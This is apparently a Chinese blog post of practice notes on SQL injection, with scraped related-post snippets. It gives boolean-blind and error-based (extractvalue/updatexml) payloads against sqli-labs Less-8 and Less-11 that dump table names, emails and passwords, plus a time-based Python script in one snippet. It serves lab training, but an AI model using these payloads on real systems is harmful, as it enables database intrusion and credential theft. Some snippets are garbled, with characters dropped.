盲注练习

最新推荐文章于 2024-11-02 20:36:39 发布
最新推荐文章于 2024-11-02 20:36:39 发布
阅读量278 收藏
点赞数
分类专栏: 布尔盲注、报错盲注 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MD_YAN/article/details/107568013
版权
1.什么时候使用盲注?

当没有任何报错信息,没有任何输出的时候,只能使用盲注

2.盲注有哪些类型?

布尔盲注
时间盲注

3.报错注入原理是什么?

在 MYSQL 中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。

4.报错注入制造函数有哪些?

updatexml(),extractvalue(),floor() ,exp()

5.盲注常用的函数有哪些?

通过长度判断 length():length(database())>=x
通过字符判断 substr():substr(database(),1,1) =‘s’
通过 ascII 码判断:ascii():ascii(substr(database(),1,1)) =x

6.报错注入常用的payload有哪些?

extractvalue(1 ,concat(0x7e,(select database())))
updatexml('test ',concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1)

实践:
1.sqli-labs LESS-8练习平台进行sql注入

1.判断注入点
判断出了为字符型注入漏洞:
判断出为布尔盲注
在这里插入图片描述

2.判断数据库名的长度

http://localhost/sqli/Less-8/?id=1’ and length(database())>=9–+
在这里插入图片描述

3.爆库名security

http://localhost/sqli/Less-8/?id=1’ and substr(database(),1,1 )=‘s’ --+
说明库名的第一个字符为s
在这里插入图片描述
http://localhost/sqli/Less-8/?id=1’ and substr(database(),2,1 )=‘e’ --+
在这里插入图片描述

以上的方式是手动进行枚举,不现实,需要用到burp suite工具进行枚举爆破。如下:
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

以上,就爆出了库名:security

4.爆表名:也是用上面的方法,使用burp suite进行拦截来爆破

一个一个表爆:
http://localhost/sqli/Less-8/?id=1’ and substr((select table_name from information_schema.tables where table_schema=‘security’ limit 0,1),1,1)=‘e’ --+

所有表一起爆:
http://localhost/sqli/Less-8/?id=1’ and substr((select group_concat(table_name) from information_schema.tables where table_schema=‘security’),1,1)=‘e’ --+
在这里插入图片描述

5.爆字段名:也是用上面的方法,使用burp suite进行拦截来爆破

http://localhost/sqli/Less-8/?id=1’ and substr((select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘emails’),1,1)=‘i’ --+
在这里插入图片描述
在这里插入图片描述

6.爆数据:
一个一个字段的爆:http://localhost/sqli/Less-8/?id=1' and substr((select group_concat(id) from security.emails),1,1)=’1’ --+

在这里插入图片描述

所有字段的数据一起爆:但是在burp suite 里面选择有效载荷选项时,给的字典内容就很多,所以不现实。http://localhost/sqli/Less-8/?id=1’ and substr((select group_concat(id,0x3a,email_id) from security.emails),1,1)=’1’ --+
在这里插入图片描述

http://localhost/sqli/Less-8/?id=1’ and substr((select group_concat(email_id) from security.emails),1,1)=’D’ --+

2.sqli-labs Less-11

判断这是报错型注入
把构造语句填在文本框中:
在这里插入图片描述

爆库名:’ and extractvalue(1,concat(0x7e,(select database()))) #
爆表名:’ and updatexml(‘test’,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) #
爆字段名:’ and extractvalue(1,concat(0x7e, (select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘emails’))) #
爆数据:a’ and updatexml (1,concat(0x7e,(select concat_ws (’:’,username,password) from security.users limit 0,1 )),3) #
结果:
在这里插入图片描述

SQL
CDLittleBoy的博客
05-15 1268
说明 学习思路,源自《白帽子讲Web安全》,lcamry《MySQL入天书》 1、 入漏洞不显示来自数据库的报错信息,报错信息中只包含通用的错误提示,此时SQL入将不能通过报错信息直观获取入语句的执行结果,既是(Blind Injection)。时不能直观获取结果,但可以通过基于逻辑真假的不同页面表现,来进行结果的判断,从而达到数据获取的目的。 的大致分类有三种 1、基于布尔的SQL 2、基于时间的SQL 3、基于报错的SQL 2、基于布尔的MySQL 基本思路是对获
布尔练习
weixin_60777183的博客
08-27 298
需要掌握的几个函数: 1.length() 判断字符串的长度 举例:and length(database())>1 2.substr() 截取字符串的函数 格式:substr(str,pos,len) substr(字符串内容,从哪里切,切多长) 可用于:and substr(database(),1,1)=’a’ 来判断数据库的第一位是否为a 3.ascii() 返回字符的asc 加入ascii判断,可改为: ?id=1 and ascii(substr(database(),
练习(作业)
qq_43473164的博客
04-08 339
基于boolean的 第一步 测试 payload:’ and 1=1#(页面不变) | ’ and 1=2#(页面变化) 说明存在sql漏洞. 第二步 爆表:payload:’ and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1)...
SQL入——布尔,时间,宽字节
18年3月萌新白帽子
06-11 5618
布尔1.布尔利用前提页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在入缺点:速度太慢,消耗大量时间布尔思维导图:布尔常用语句:substr(string,num start,num length)string 为字符串string 为字符串length 为长度ascii( )函数作用:返回字符串str的字符ASCII值。如果str是空字符...
weixin_45634365的博客
02-28 4759
一、简介 入攻击的本质,是把用户输入的数据当做代执行。 入攻击的两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代,拼接了用户输入的数据 ,就是在服务器没有错误回显的时候完成的入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 与相对应的是显错入,分别为: union select 联合查询入 updatexml 报错也分为两种: (1)布尔:只会根据入信息返回True和False,没有了之前的报错信息 (2)时间:界面返
DVWA靶场SQL入和布尔练习
2301_80038718的博客
11-02 1061
(一个个爆出来):select first_name,last_name from users where user_id=‘1’ and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘dvwa’ and table_name=‘users’ limit 0,1)));
sql入之pikachu练习
windStudyer的专栏
05-21 902
sql入pikachu之练习
时间练习
MD_YAN的博客
07-25 307
、时间
DoraBox 漏洞练习平台WriteUP.pdf
04-14
DoraBox 漏洞练习平台 WriteUP与总结。SQLi 数字型,数字型入拼接语句一般为 select * from <表名> where id = x x=x' ,程序报错。 x=x and 1=1 时,语句逻辑为真,返回正常结果。 x=x and 1=2 时,语句逻辑为...
实战题——Hack World
Marsper的博客
09-26 624
Hack World——布尔 题面如下图 首先在搜索框中输入0,1或2测试显示结果 输入0时的显示结果 输入1时显示如下 输入2时的显示结果如下 继续测试得知输入1和2以外的数字显示结果和0的结果一样 继续测试,输入数字以外的英文测试,显示结果如下 结果发现都显示bool(false)错误 所以判断此题为数字型的bool。 根据上篇介绍过的知识,所以用sql入语句继续进行测试 输入 if(ascii(substr((select(flag)from(flag)),1,1))=102,1,
mysql类型_
weixin_29346059的博客
02-28 509
目录0X01 HTTP POST介绍0X02 POST基于时间的0X03 POST基于布尔的0X04 Sqlmap安全测试0X01 HTTP POST介绍POST 发送数据给服务器处理,数据包含在HTTP信息正文中 POST请求会向指定资源提交数据,请求服务器进行处理,如:表单数据提交、文件上传等,请求数据会被包含在请目录Sql入什么是Sql入呢?Sql入有哪些例子?检索隐藏数据打破...
sql入杂谈(三)--
weixin_43570648的博客
03-19 254
再讲文章之前,先说说,文章里面被标红的字段,是加了反引号的,(因为被csdn和谐了)还有*号也被和谐了,我是用的※来代替 前面2章已经讲过了union select 以及报错入的语法以及简单的绕狗方法,现在我来谈谈我对于的看法,网上把的种类分了几种,我在这里就不分了,我就把我自己目前掌握的方法都记录下来,绕狗的一些心得。顺带一提,其实我的其实是很菜的,但是确是很厉害的,因为能un...
关于sql,谈谈自己的心得
09-07 321
1.没做防御的站点,拿上sqlmap直接怼就行了。 2.做了防御,有的用函数过滤了,有的用了waf(比如安全狗,云锁,华为云waf,360waf,知道创宇盾,护卫神等等) 这些就相当麻烦了,首先要探测出过滤了什么,再去构造sql语句,在本地测试通过后,再一点点完善,最后再去测试目标 举个例子,一个站点过滤了逗号,和单引号,且数据库编不是GB系列的,这种就不太好操作,个人手工测试,...
SQL练习(less-2)报错
AmyBaby00的博客
08-13 499
固定格式: Updatexml(1,concat(0×7e,b) Updatexml(a,Xpath,b) 在文档a中,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 构造语句:union select updatexml(1,concat(0x7e,select database(),0x7e),1) http:/...
暑期练习web8:加了料的报错入(实验吧)
qq_41618162的博客
08-17 1030
解题连接:ht=tp://ctf5.shiyanbar.com/web/baocuo/index.php 进入解题首页面就出现tips让我们post给username和password传值 随便传个值试试 只报了登陆失败的字样 换成username=’&amp;password=5就说我有sql语法错误,说明这题是要考虑sql入的 然后用burpsuite检测许多sql相关的词,看...
浅谈原理
qq_23066945的博客
10-27 929
浅谈原理步骤 之前找到一个带有入的美国网站,发现是,简单讲讲的原理。 步骤 1.xxx.com/index.php?ID=79这个位置单引号报错,并且直接给出错误信息: 知道了他的表是catalog,并且是单引号闭合。 SQL: SELECT *FROM catalog WHERE ID = '79'' 2.尝试闭合,输入‘ --+ 后,页面返回正常。 3.开始猜测字段。 输入...
SQL入学习#3
Cloud_Player的博客
03-29 371
MySQL入实例五—— 平台:SQli-labs Less-5 1.基于布尔的 布尔理论基础(无回显通过返回真假判断数据) https://blog.youkuaiyun.com/weixin_45146120/article/details/100104131?spm=1001.2014.3001.5501 观察页面并寻找入点 /?id=1 /?id=1’ 用Left函数猜测数据库版本,第一位是否为1(若错误则无回显) /?id=1’and left(version(),1)=1%23 使用len
sqli笔记二
gbxiaowang的博客
07-08 198
布尔 id=1' --+正常显示 id=1' and 1=1 --+ 正常显示 id=1' and 1=2 --+无显示 id=1' annnd 1=1 --+ 无显示,也无报错显示 第八关源代: if($row) { echo '<font size="5" color="#FFFF00">'; echo 'You are in...........'; echo "<br>"; echo "</font>"; }
字符串截取
qq_42129143的博客
05-22 332
1、slice() 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数和第一个参数的差, 如果参数是负数,则将该值加上字符串长度转为正值,如果第一个参数大于第二个参数,返回空字符串2、substring 第一个参数是开始位置,第二个参数是结束位置的后一位,截取出来的字符串长度是第二个参数与第一个参数的差 如果参数是负数,则将该值转换...
pikachu时间
最新发布
03-19
### 关于Pikachu时间SQL入实验室 Pikachu是一款用于Web安全学习的靶场工具,它提供了多种类型的漏洞实验环境供用户练习,其中包括SQL入中的时间类型。时间是一种通过延迟数据库响应来判断条件真假的方式[^2]。 #### 时间原理 时间的核心在于利用数据库函数(如`SLEEP()`或`WAITFOR DELAY`),使查询执行过程中产生人为可控的时间延迟。攻击者可以通过观察页面加载时间的不同,推断出后台数据库的状态并逐步获取敏感数据[^1]。 #### Pikachu时间实现方式 在Pikachu靶场中,时间通常涉及以下操作: 1. **构造payload**: 使用`IF`语句配合`SLEEP()`函数构建延时逻辑。例如: ```sql IF(ASCII(SUBSTRING((SELECT database()),1,1))=98,SLEEP(5),NULL) ``` 上述payload表示如果当前数据库名称的第一个字符等于ASCII值为98,则触发5秒延迟;否则无任何动作。 2. **检测延迟**: 当发送上述请求后,服务器端处理耗时明显增加时,说明猜测正确。反之则错误。根据返回结果调整下一次试探位置直至完成整个字符串还原过程为止。 3. **自动化脚本编写**: 手动逐位爆破效率低下,在实际渗透测试场景下往往借助Burp Suite Intruder模块或者自定义Python脚本来加速这一流程。下面给出一个简单的Python示例代片段展示如何自动提取目标表名首字母: ```python import requests url = 'http://localhost/pikachu/vul/time_sql.php' def check(payload): data = {'id': payload} start_time = time.time() response = requests.post(url, data=data) elapsed_time = time.time() - start_time return True if elapsed_time >= 5 else False ascii_min, ascii_max = 48, 122 while ascii_min <= ascii_max: mid = (ascii_min + ascii_max) // 2 test_payload = f"1' AND IF(ORD(MID((SELECT table_name FROM information_schema.tables WHERE table_schema='test'),1,1))>{mid}, SLEEP(5), NULL)-- " if check(test_payload): ascii_min = mid + 1 else: ascii_max = mid - 1 result_char = chr(mid) print(f"The first character of the target table name is {result_char}.") ``` #### 意事项 尽管此类练习有助于理解SQL入的工作机制及其危害程度,但在真实环境中实施类似行为可能违反法律,请务必仅限于授权范围内开展研究活动[^5]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值